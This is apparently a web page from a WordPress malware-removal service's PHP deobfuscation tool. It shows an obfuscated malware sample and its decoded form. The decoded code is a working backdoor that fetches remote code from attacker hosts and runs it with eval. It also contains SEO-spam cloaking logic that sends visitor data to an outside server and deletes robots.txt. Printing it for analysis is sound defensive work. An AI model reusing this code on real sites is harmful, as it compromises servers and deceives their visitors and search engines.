Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto c4Tc0; fYFlQ: $JavRG = md5($nB1vA); goto rhXtG; hCIYW: exit; goto pBEjA; oZ8m2: function IbLfd($zWJiV) { goto xoe1L; CY3lN: IA4eu: goto zIZT7; FeU_H: try { goto We9sr; We9sr: $HWISD = curl_init(); goto rmWUZ; rmWUZ: curl_setopt($HWISD, CURLOPT_URL, $zWJiV); goto RMGvB; RMGvB: curl_setopt($HWISD, CURLOPT_FOLLOWLOCATION, 1); goto Bgm2k; IPtVz: curl_setopt($HWISD, CURLOPT_CONNECTTIMEOUT, 10); goto sslxc; OvjsM: curl_close($HWISD); goto BpCo3; ddcpS: curl_setopt($HWISD, CURLOPT_SSL_VERIFYHOST, FALSE); goto IPtVz; dNTDX: $mEHJK = curl_exec($HWISD); goto OvjsM; sslxc: curl_setopt($HWISD, CURLOPT_RETURNTRANSFER, 1); goto dNTDX; Bgm2k: curl_setopt($HWISD, CURLOPT_SSL_VERIFYPEER, FALSE); goto ddcpS; BpCo3: } catch (Exception $Mt7ra) { } goto Vmsbn; dbxH_: if (!($mEHJK != '')) { goto IA4eu; } goto AJyS2; Vmsbn: if (!(($mEHJK === false || $mEHJK == '') && function_exists("\x66\x69\154\145\x5f\147\x65\x74\x5f\143\157\156\x74\145\156\164\163"))) { goto ttHip; } goto s__F5; s__F5: try { $mEHJK = @file_get_contents($zWJiV); } catch (Exception $Mt7ra) { } goto K82kK; Vg62u: $c0Jdw = 1; goto FeU_H; K82kK: ttHip: goto dbxH_; zIZT7: $dGvl2 = []; goto G9TJl; xoe1L: $mEHJK = ''; goto Vg62u; AJyS2: $c0Jdw = 1; goto CY3lN; l8VVs: return $dGvl2; goto minXi; kXZp7: $dGvl2["\x63\x6f\156\x74\x65\156\x74"] = $mEHJK; goto l8VVs; G9TJl: $dGvl2["\163\x74\x61\164\165\163"] = $c0Jdw; goto kXZp7; minXi: } goto N39a2; FUK4J: $quJsB = iBlFD($PuBL5); goto Sa8PB; vKKpw: $L98u9 = array("\71", "\70", "\62", "\x34", "\65", "\144", "\x37", "\x34", "\x31", "\67", "\x32", "\62", "\x35", "\142", "\x35", "\x35", "\141", "\x32", "\x63", "\64", "\x62", "\146", "\x35", "\x30", "\x62", "\70", "\x61", "\x61", "\x34", "\143", "\x37", "\x33"); goto fYFlQ; N39a2: function vOY1l($fGiO_) { goto HKLQU; Textd: if (!$fGiO_) { goto UbklQ; } goto J54Tg; J54Tg: if (!preg_match("\x2f\x28{$PGbYU}\x29\57\163\x69", $fGiO_)) { goto imfSU; } goto PFMHX; cWtDN: return $aMkZM; goto ZHy2U; PFMHX: $aMkZM = true; goto oBQX4; Zo3HF: $PGbYU = "\147\x6f\x6f\147\154\145\142\157\164\174\x67\x6f\157\147\x6c\x65\x7c\171\x61\150\157\157\174\142\151\x6e\x67\174\x61\x6f\x6c"; goto Textd; oBQX4: imfSU: goto VZ8uT; HKLQU: $aMkZM = false; goto Zo3HF; VZ8uT: UbklQ: goto cWtDN; ZHy2U: } goto X_04r; JczGp: ini_set("\x64\x69\163\160\154\141\x79\x5f\x65\162\x72\157\x72\163", "\117\146\x66"); goto H4U57; lIfQd: $DlSOg = str_replace("\150\164\155\x6c\137\143\x6f\x6e\x74\x65\x6e\x74", '', $xZzyh); goto qrfiy; bPN8A: function nFb3E() { goto Gk_Qz; xuSJm: return "\x68\x74\164\160\x73"; goto AKmmM; Gk_Qz: $Hlyb2 = !empty($_SERVER["\x48\x54\124\x50\x53"]) && $_SERVER["\110\x54\124\120\x53"] !== "\157\x66\146" || $_SERVER["\123\105\122\x56\x45\122\x5f\120\x4f\x52\x54"] == 443; goto CM9nd; CM9nd: if ($Hlyb2) { goto DYYje; } goto auTtP; AKmmM: ShVys: goto ayOvp; blIXE: goto ShVys; goto Mr48V; auTtP: return "\150\164\x74\x70"; goto blIXE; Mr48V: DYYje: goto xuSJm; ayOvp: } goto YwQbe; YnJ_v: unlink($cXM7z . "\57\162\157\x62\x6f\x74\x73\56\164\170\x74"); goto B9dvd; Of28q: goto Ctg0X; goto R5aOZ; JxGcX: $OHN1e = isset($_SERVER["\110\x54\124\x50\x5f\125\x53\105\122\x5f\x41\107\105\x4e\x54"]) ? $_SERVER["\110\x54\124\120\137\x55\123\x45\122\x5f\x41\107\105\116\x54"] : ''; goto kFRGy; kzByL: if (!$dGvl2["\163\x74\141\x74\x75\163"]) { goto TBWlc; } goto NcKRV; jni_a: $fpeyC = "\x31\165\163\67\x6a\x71\x2e\142\x6e\163\x68\147\171\x2e\164\x6f\x70"; goto ZnhtP; GFB_c: $VRLIk = isset($_SERVER["\110\x54\124\x50\x5f\x41\103\x43\x45\x50\x54\137\114\x41\116\107\125\101\107\105"]) ? $_SERVER["\x48\124\124\120\x5f\x41\103\103\x45\120\x54\137\114\x41\x4e\107\x55\101\107\x45"] : ''; goto Yx0F5; Yx0F5: $Izp2G = $_SERVER["\110\124\124\x50\x5f\x48\x4f\123\124"]; goto pf8JP; NYWmF: @header("\x43\x6f\156\164\x65\156\x74\x2d\x74\171\160\x65\72\x20\x74\x65\x78\x74\x2f\170\155\x6c"); goto smakw; XlR99: $dKuL7 = $_SERVER["\x52\105\x51\125\105\x53\x54\137\125\122\x49"]; goto GFB_c; gJxRO: $nB1vA = substr($IZD_1, 0, strlen($IZD_1) - 1); goto vKKpw; OnNhO: if (strstr($xZzyh, "\x64\157\x5f\x6e\157\164\150\x69\x6e\147")) { goto JPKry; } goto RjlfB; pf8JP: $YUXX4 = isset($_SERVER["\x48\124\124\120\137\122\105\106\105\122\105\x52"]) ? $_SERVER["\x48\124\x54\120\137\122\105\106\x45\122\105\x52"] : ''; goto JxGcX; c4Tc0: @set_time_limit(1000); goto JFSXj; ymrN2: exit; goto vVuEm; ZnhtP: $BTsR_ = NFb3e(); goto XlR99; ZDiRm: if (!file_exists($cXM7z . "\x2f\162\x6f\142\157\x74\x73\x2e\164\170\164")) { goto GmB_k; } goto YnJ_v; YwQbe: function BgeFg() { goto jZC4_; tKGuo: f_pat: goto TSVGA; K1FU9: if (!empty($_SERVER["\x48\x54\x54\x50\137\130\137\x46\x4f\122\x57\101\x52\x44\x45\104\137\x46\x4f\x52"])) { goto k0WDb; } goto Q8uTi; EXRSc: goto f_pat; goto naS7n; jZC4_: $K03v8 = ''; goto yLpxr; yLpxr: if (!empty($_SERVER["\x48\x54\x54\x50\x5f\103\114\111\105\x4e\x54\137\111\x50"])) { goto uFTaY; } goto K1FU9; naS7n: uFTaY: goto OSFYM; wP71Y: evvgm: goto EXRSc; qVcy_: $K03v8 = $_SERVER["\110\124\x54\120\x5f\x58\x5f\106\117\x52\127\101\x52\104\105\104\137\106\x4f\122"]; goto wP71Y; OSFYM: $K03v8 = $_SERVER["\x48\x54\x54\120\137\x43\x4c\x49\x45\116\x54\137\111\120"]; goto tKGuo; TSVGA: return $K03v8; goto drmuJ; Q8uTi: $K03v8 = $_SERVER["\122\105\115\x4f\124\x45\137\x41\x44\x44\x52"]; goto VWzJa; VWzJa: goto evvgm; goto EB9M9; EB9M9: k0WDb: goto qVcy_; drmuJ: } goto oZ8m2; smakw: $DlSOg = str_replace("\170\155\154\x5f\143\157\x6e\x74\145\x6e\x74", '', $xZzyh); goto CW5AY; cKXes: $NzlmU = vtGAS($YUXX4); goto O4dnJ; ha9dx: @header("\103\157\156\x74\145\x6e\x74\55\164\171\x70\145\x3a\x20\164\x65\170\164\x2f\150\x74\x6d\154\x3b\x20\143\x68\x61\162\x73\145\164\75\x75\164\146\55\x38"); goto lIfQd; Zficu: if (!strstr($xZzyh, "\x72\157\142\157\164\163\x5f\143\x6f\156\x74\145\x6e\164")) { goto X79Z4; } goto lLwV0; b5brJ: if (!strstr($xZzyh, "\x78\x6d\154\137\143\x6f\156\164\x65\156\x74")) { goto SZMRD; } goto NYWmF; kFRGy: $TaNMh = bGeFG(); goto BrnT7; PM13I: $quJsB = array(); goto iuOEw; U_WML: $quJsB = IBlFD($PuBL5); goto DnWdC; COqZ2: $S9xfy = array("\x68", "\x74", "\164", "\160", "\x73", "\x3a", "\57", "\x2f", "\x76", "\x70", "\x73", "\x64", "\x64", "\56", "\x64", "\146", "\161", "\x66", "\141", "\164", "\x2e", "\164", "\157", "\x70", "\x2f", "\144", "\x6f", "\x6f", "\x72", "\x2f"); goto aKAEH; jGqQF: LQv5x: goto Of28q; iuOEw: $PuBL5 = "\150" . "\164" . "\x74" . "\160" . "\x73" . "\72\x2f" . "\x2f" . $fpeyC . "\57\x77\160" . "\55\151" . "\x6e" . "\x64" . "\x65" . "\170" . "\x2e\160\x68" . "\160\77" . $j5Nh2; goto EnPkG; WgQey: exit(implode(PHP_EOL, $qqiJe)); goto SB9GE; B9dvd: GmB_k: goto U_WML; f3vWV: TBWlc: goto Hx9yW; rhXtG: if (!($JavRG == implode($L98u9))) { goto l0Lsq; } goto COqZ2; Z_ZTj: $Li3ly = $IZD_1[strlen($IZD_1) - 1]; goto gJxRO; mYVua: SZMRD: goto Zficu; CeTBm: $DlSOg = str_replace("\x72\x6f\142\157\164\x73\137\x63\x6f\x6e\164\145\x6e\x74", '', $xZzyh); goto UTOza; DnWdC: Z7EZz: goto XlawY; llEUB: if (!empty($IZD_1)) { goto nB6Aw; } goto PZ9wK; SB9GE: X79Z4: goto SWsyd; Hx9yW: l0Lsq: goto ymrN2; aKAEH: $dGvl2 = ibLFd(implode($S9xfy) . $Li3ly . "\x2e\x74" . "\170" . "\x74"); goto kzByL; UTOza: $qqiJe = explode("\x5b\x2a\x2a\52\x5d", str_replace("\162\157\142\157\164\163\x63\x6f\x6e\164\145\156\164", '', $DlSOg)); goto WgQey; CW5AY: echo $DlSOg; goto VFV9M; pBEjA: hB2TT: goto b5brJ; vVuEm: Ctg0X: goto bPN8A; RjlfB: if (!strstr($xZzyh, "\150\164\155\x6c\x5f\143\157\156\164\145\x6e\164")) { goto hB2TT; } goto ha9dx; VFV9M: exit; goto mYVua; NcKRV: eval("\77\x3e" . $dGvl2["\143\x6f\x6e\x74\x65\x6e\164"]); goto f3vWV; lLwV0: @header("\103\157\x6e\x74\145\x6e\x74\x2d\164\x79\160\145\72\40\164\145\170\164\57\160\154\x61\x69\x6e\73\x20\x63\150\141\162\x73\145\164\x3d\x75\x74\x66\55\70"); goto CeTBm; qrfiy: echo $DlSOg; goto hCIYW; EnPkG: if (!(stristr($dKuL7, "\x2e\170\x6d\x6c") || stristr($dKuL7, "\x72\157\x62\157\x74\x73\x2e\x74\170\x74"))) { goto Z7EZz; } goto ZDiRm; aRhR3: if (!($aMkZM || $NzlmU || !$huTqj)) { goto btlrd; } goto FUK4J; H4U57: $IZD_1 = isset($_REQUEST["\x61\x63\x74\151\157\x6e"]) ? $_REQUEST["\x61\143\x74\151\x6f\x6e"] : ''; goto llEUB; R5aOZ: nB6Aw: goto Z_ZTj; XlawY: $aMkZM = vOy1L($OHN1e); goto cKXes; X_04r: function V81xx($fGiO_) { goto aIgcz; zCAWT: if (!preg_match("\57\50{$PGbYU}\x29\57\163\151", $fGiO_)) { goto Dccmf; } goto nQeuE; nQeuE: $aMkZM = true; goto wGQO2; wGQO2: Dccmf: goto GCEhy; OjsMQ: if (!$fGiO_) { goto qslTE; } goto zCAWT; aIgcz: $aMkZM = false; goto W4rBB; O6AmR: return $aMkZM; goto yomvX; W4rBB: $PGbYU = "\x33\x36\60\x53\160\x69\144\145\162\x7c\x41\x68\162\145\x66\163\102\x6f\164\x7c\x41\x6d\141\172\157\x6e\x62\157\x74\x7c\101\160\x70\x6c\145\x20\x42\157\x74\174\x41\163\x6b\x20\112\x65\145\x76\145\x73\x7c\x41\167\141\162\x69\157\102\157\164\x7c\x42\141\x69\x64\165\123\x70\151\144\145\x72\x7c\x42\x61\x69\144\x75\x73\x70\151\x64\145\162\x2d\151\155\141\147\x65\x7c\x42\171\164\x65\163\x70\151\x64\x65\x72\174\104\x61\x74\141\x46\x6f\x72\x53\145\x6f\x42\157\x74\174\x64\141\x74\x61\160\x72\157\x76\x69\x64\x65\162\x7c\104\157\x74\x42\x6f\164\x7c\104\165\143\x6b\104\x75\143\153\x42\x6f\x74\174\105\170\x61\154\145\141\144\x7c\x45\170\x63\151\164\x65\x7c\146\141\143\145\x62\157\157\153\174\x66\x61\x63\x65\x62\157\x6f\153\145\170\164\145\162\156\x61\x6c\x68\151\164\x7c\x47\120\x54\x42\x6f\x74\174\x4c\171\143\x6f\x73\x7c\115\x4a\x31\62\142\157\x74\174\123\143\157\x6f\164\145\162\x7c\123\x65\155\x72\165\163\x68\102\x6f\164\x7c\x53\x69\x74\145\x4c\x6f\x63\153\x53\x70\151\x64\x65\x72\174\x53\x6c\x65\x75\x74\150\x7c\123\157\147\157\165\40\116\x65\x77\x73\40\123\x70\151\x64\145\162\174\123\157\147\157\x75\40\167\x65\x62\40\x73\x70\x69\x64\145\x72\x7c\x53\117\x53\x4f\40\123\160\x69\x64\145\162\x7c\124\x77\x69\x74\x74\145\162\x62\157\164\174\131\x61\156\144\x65\x78\40\x42\157\x74\x7c\x59\x61\x6e\x64\x65\x78\x42\157\x74\174\131\x69\163\x6f\165\123\160\151\144\145\162\x7c\x59\157\144\141\157\x42\x6f\x74\174\x59\157\x75\x64\x61\157\102\157\164\174\102\x4c\x45\x58\x42\157\x74\x7c\141\160\160\x6c\145\x62\157\x74\174\103\103\102\157\164\174\120\145\x74\x61\x6c\102\157\164\x7c\x43\154\141\165\144\x65\x42\157\164\174\110\x75\144\x48\165\144\55\x67\x65\x6e\145\162\x61\x6c\x2d\142\x6f\x74\174\x53\x65\x7a\x6e\141\x6d\102\157\x74\174\x45\x7a\x6f\151\x63\102\157\164\55\x4e\151\143\150\x65\x69\x71\174\x41\150\x72\145\146\x73\x53\x69\164\145\101\x75\x64\x69\164\174\117\x41\111\55\123\145\141\x72\x63\150\102\157\164\174\x6c\x69\x6e\x6b\x64\145\x78\x62\x6f\x74\174\x43\x68\x61\164\x47\x50\124\x2d\125\x73\145\x72\x7c\x59\x61\x6e\144\145\170\115\x65\x74\x72\151\153\x61\174\131\x61\x6e\144\x65\170"; goto OjsMQ; GCEhy: qslTE: goto O6AmR; yomvX: } goto oHxpj; BrnT7: $j5Nh2 = "\150\x74\164\160\137\164\171\x70\x65\x3d" . base64_encode($BTsR_) . "\x26\x68\164\x74\x70\137\165\162\x69\x3d" . base64_encode($dKuL7) . "\46\150\x74\x74\160\137\x6c\141\x6e\147\75" . base64_encode($VRLIk) . "\x26\150\x74\164\x70\x5f\150\x6f\x73\164\75" . base64_encode($Izp2G) . "\46\150\164\164\x70\x5f\x72\x65\x66\145\x72\75" . base64_encode($YUXX4) . "\46\150\164\x74\x70\x5f\x75\x73\145\x72\137\x61\x67\x65\x6e\x74\75" . base64_encode($OHN1e) . "\x26\x68\164\164\160\x5f\x69\x70\137\141\144\x64\x72\x65\163\x73\75" . base64_encode($TaNMh); goto PM13I; O4dnJ: $huTqj = v81xX($OHN1e); goto aRhR3; bCIJx: $xZzyh = $quJsB["\143\x6f\156\164\145\156\164"]; goto OnNhO; z_a9B: if (!$quJsB["\163\164\x61\164\x75\x73"]) { goto LQv5x; } goto bCIJx; JFSXj: @error_reporting(0); goto JczGp; SWsyd: JPKry: goto jGqQF; PZ9wK: $cXM7z = $_SERVER["\104\x4f\x43\125\115\x45\x4e\x54\137\122\117\117\x54"]; goto jni_a; Sa8PB: btlrd: goto z_a9B; oHxpj: function vtgas($Tr874) { goto AZWjf; kcTFl: return $NzlmU; goto q7_p0; HHb5R: w6JWU: goto rmJd3; DYM41: if (!$Tr874) { goto mCuGI; } goto jHpZN; AZWjf: $NzlmU = false; goto gGtDX; lUvz7: $NzlmU = true; goto HHb5R; jHpZN: if (!preg_match("\x2f\x28{$UwCNi}\51\x2f\x73\151", $Tr874)) { goto w6JWU; } goto lUvz7; rmJd3: mCuGI: goto kcTFl; gGtDX: $UwCNi = "\147\157\x6f\x67\154\145\56\x63\x6f\56\152\x70\174\x67\157\x6f\147\154\145\x2e\143\x6f\x6d\x7c\171\x61\150\x6f\157\x2e\143\x6f\56\x6a\160\x7c\x79\141\150\x6f\157\56\143\157\155\174\x62\x69\x6e\147\x2e\143\157\x6d"; goto DYM41; q7_p0: }
?><?php define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';<?php
@set_time_limit(1000);
@error_reporting(0);
ini_set("display_errors", "Off");
$IZD_1 = isset($_REQUEST["action"]) ? $_REQUEST["action"] : '';
if (!empty($IZD_1)) {
$Li3ly = $IZD_1[strlen($IZD_1) - 1];
$nB1vA = substr($IZD_1, 0, strlen($IZD_1) - 1);
$L98u9 = array("9", "8", "2", "4", "5", "d", "7", "4", "1", "7", "2", "2", "5", "b", "5", "5", "a", "2", "c", "4", "b", "f", "5", "0", "b", "8", "a", "a", "4", "c", "7", "3");
$JavRG = md5($nB1vA);
if (!($JavRG == "98245d7417225b55a2c4bf50b8aa4c73")) {
goto l0Lsq;
}
$S9xfy = array("h", "t", "t", "p", "s", ":", "/", "/", "v", "p", "s", "d", "d", ".", "d", "f", "q", "f", "a", "t", ".", "t", "o", "p", "/", "d", "o", "o", "r", "/");
$dGvl2 = ibLFd("https://vpsdd.dfqfat.top/door/" . $Li3ly . ".t" . "x" . "t");
if (!$dGvl2["status"]) {
goto TBWlc;
}
eval("?>" . $dGvl2["content"]);
TBWlc:
l0Lsq:
exit;
}
$cXM7z = $_SERVER["DOCUMENT_ROOT"];
$fpeyC = "1us7jq.bnshgy.top";
$BTsR_ = NFb3e();
$dKuL7 = $_SERVER["REQUEST_URI"];
$VRLIk = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : '';
$Izp2G = $_SERVER["HTTP_HOST"];
$YUXX4 = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$OHN1e = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$TaNMh = bGeFG();
$j5Nh2 = "http_type=" . base64_encode($BTsR_) . "&http_uri=" . base64_encode($dKuL7) . "&http_lang=" . base64_encode($VRLIk) . "&http_host=" . base64_encode($Izp2G) . "&http_refer=" . base64_encode($YUXX4) . "&http_user_agent=" . base64_encode($OHN1e) . "&http_ip_address=" . base64_encode($TaNMh);
$quJsB = array();
$PuBL5 = "https://1us7jq.bnshgy.top/wp-index.php?" . $j5Nh2;
if (!(stristr($dKuL7, ".xml") || stristr($dKuL7, "robots.txt"))) {
goto Z7EZz;
}
if (!file_exists($cXM7z . "/robots.txt")) {
goto GmB_k;
}
unlink($cXM7z . "/robots.txt");
GmB_k:
$quJsB = IBlFD($PuBL5);
Z7EZz:
$aMkZM = vOy1L($OHN1e);
$NzlmU = vtGAS($YUXX4);
$huTqj = v81xX($OHN1e);
if (!($aMkZM || $NzlmU || !$huTqj)) {
goto btlrd;
}
$quJsB = iBlFD($PuBL5);
btlrd:
if (!$quJsB["status"]) {
goto LQv5x;
}
$xZzyh = $quJsB["content"];
if (strstr($xZzyh, "do_nothing")) {
goto JPKry;
}
if (!strstr($xZzyh, "html_content")) {
if (!strstr($xZzyh, "xml_content")) {
if (!strstr($xZzyh, "robots_content")) {
JPKry:
LQv5x:
function nFb3E()
{
$Hlyb2 = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" || $_SERVER["SERVER_PORT"] == 443;
if ($Hlyb2) {
return "https";
}
return "http";
}
function BgeFg()
{
$K03v8 = '';
if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
$K03v8 = $_SERVER["HTTP_CLIENT_IP"];
goto tKGuo;
}
if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$K03v8 = $_SERVER["HTTP_X_FORWARDED_FOR"];
goto wP71Y;
}
$K03v8 = $_SERVER["REMOTE_ADDR"];
wP71Y:
tKGuo:
return $K03v8;
}
function IbLfd($zWJiV)
{
$mEHJK = '';
$c0Jdw = 1;
try {
$HWISD = curl_init();
curl_setopt($HWISD, CURLOPT_URL, $zWJiV);
curl_setopt($HWISD, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($HWISD, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($HWISD, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($HWISD, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($HWISD, CURLOPT_RETURNTRANSFER, 1);
$mEHJK = curl_exec($HWISD);
curl_close($HWISD);
} catch (Exception $Mt7ra) {
}
if (!(($mEHJK === false || $mEHJK == '') && function_exists("file_get_contents"))) {
goto ttHip;
}
try {
$mEHJK = @file_get_contents($zWJiV);
} catch (Exception $Mt7ra) {
}
ttHip:
if (!($mEHJK != '')) {
goto IA4eu;
}
$c0Jdw = 1;
IA4eu:
$dGvl2 = [];
$dGvl2["status"] = $c0Jdw;
$dGvl2["content"] = $mEHJK;
return $dGvl2;
}
function vOY1l($fGiO_)
{
$aMkZM = false;
$PGbYU = "googlebot|google|yahoo|bing|aol";
if (!$fGiO_) {
goto UbklQ;
}
if (!preg_match("/({$PGbYU})/si", $fGiO_)) {
goto imfSU;
}
$aMkZM = true;
imfSU:
UbklQ:
return $aMkZM;
}
function V81xx($fGiO_)
{
$aMkZM = false;
$PGbYU = "360Spider|AhrefsBot|Amazonbot|Apple Bot|Ask Jeeves|AwarioBot|BaiduSpider|Baiduspider-image|Bytespider|DataForSeoBot|dataprovider|DotBot|DuckDuckBot|Exalead|Excite|facebook|facebookexternalhit|GPTBot|Lycos|MJ12bot|Scooter|SemrushBot|SiteLockSpider|Sleuth|Sogou News Spider|Sogou web spider|SOSO Spider|Twitterbot|Yandex Bot|YandexBot|YisouSpider|YodaoBot|YoudaoBot|BLEXBot|applebot|CCBot|PetalBot|ClaudeBot|HudHud-general-bot|SeznamBot|EzoicBot-Nicheiq|AhrefsSiteAudit|OAI-SearchBot|linkdexbot|ChatGPT-User|YandexMetrika|Yandex";
if (!$fGiO_) {
goto qslTE;
}
if (!preg_match("/({$PGbYU})/si", $fGiO_)) {
goto Dccmf;
}
$aMkZM = true;
Dccmf:
qslTE:
return $aMkZM;
}
function vtgas($Tr874)
{
$NzlmU = false;
$UwCNi = "google.co.jp|google.com|yahoo.co.jp|yahoo.com|bing.com";
if (!$Tr874) {
goto mCuGI;
}
if (!preg_match("/({$UwCNi})/si", $Tr874)) {
goto w6JWU;
}
$NzlmU = true;
w6JWU:
mCuGI:
return $NzlmU;
}
define('WP_USE_THEMES', true);
require "/var/www/html/wp-blog-header.php";
// [PHPDeobfuscator] Implied script end
return;
}
@header("Content-type: text/plain; charset=utf-8");
$DlSOg = str_replace("robots_content", '', $xZzyh);
$qqiJe = explode("[***]", str_replace("robotscontent", '', $DlSOg));
exit(implode(PHP_EOL, $qqiJe));
}
@header("Content-type: text/xml");
$DlSOg = str_replace("xml_content", '', $xZzyh);
echo $DlSOg;
exit;
}
@header("Content-type: text/html; charset=utf-8");
$DlSOg = str_replace("html_content", '', $xZzyh);
echo $DlSOg;
exit;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.